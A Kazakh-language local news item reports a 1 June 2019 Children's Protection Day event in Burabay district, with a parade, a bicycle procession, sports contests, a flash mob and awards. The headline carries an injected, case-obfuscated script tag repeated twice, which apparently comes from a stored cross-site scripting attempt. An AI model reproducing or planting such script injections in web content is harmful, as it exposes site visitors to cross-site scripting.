ТӘУЕЛСІЗ ЕЛІМНІҢ БАҚЫТТЫ БАЛАЛАРЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.06.2019

 

1 маусым – Халықаралық балаларды қорғау күніне арналған іс-шара Бурабай ауданында жоғары деңгейде аталып өтілді. Бурабай ауданы білім бөлімі жетекшілік еткен іс-шараны ұйымдастырушы «Арман» МТОТЖО. Іс-шара барысында «Өрле, Қазақстан!» тақырыбында Щучинск қаласы мектептері мен БӨМ, қалада орналасқан колледж студенттерінің қатысуымен салтанатты шеру өтті.

Ауданның жасұландық өрендері велошеру ұйымдастырды. «Көңілді старттар» спорттық жарыстарына 3-4 сынып оқушылары қатысып, бар күштерін ортаға салды. Әртүрлі конкурстық бағдарламалар ұйымдастырылып, қала мектептері тиісті деңгейде өтуіне жауапты болды. Қаланың орталық алаңында өткен мерекелік іс-шара қала тұрғындары мен қонақтарының, балалар мен кішкентай бүлдіршіндердің көңілдерінен шықты. Биден флеш-мобқа орталық алаңда болған көпшілік қосыла биледі.

Іс-шараның соңында байқаулар мен көрме-байқауға қатысқандар марапатталды.

    

Просмотров: 649


Пікір қосу



Деректерді қолтаңбаға қосу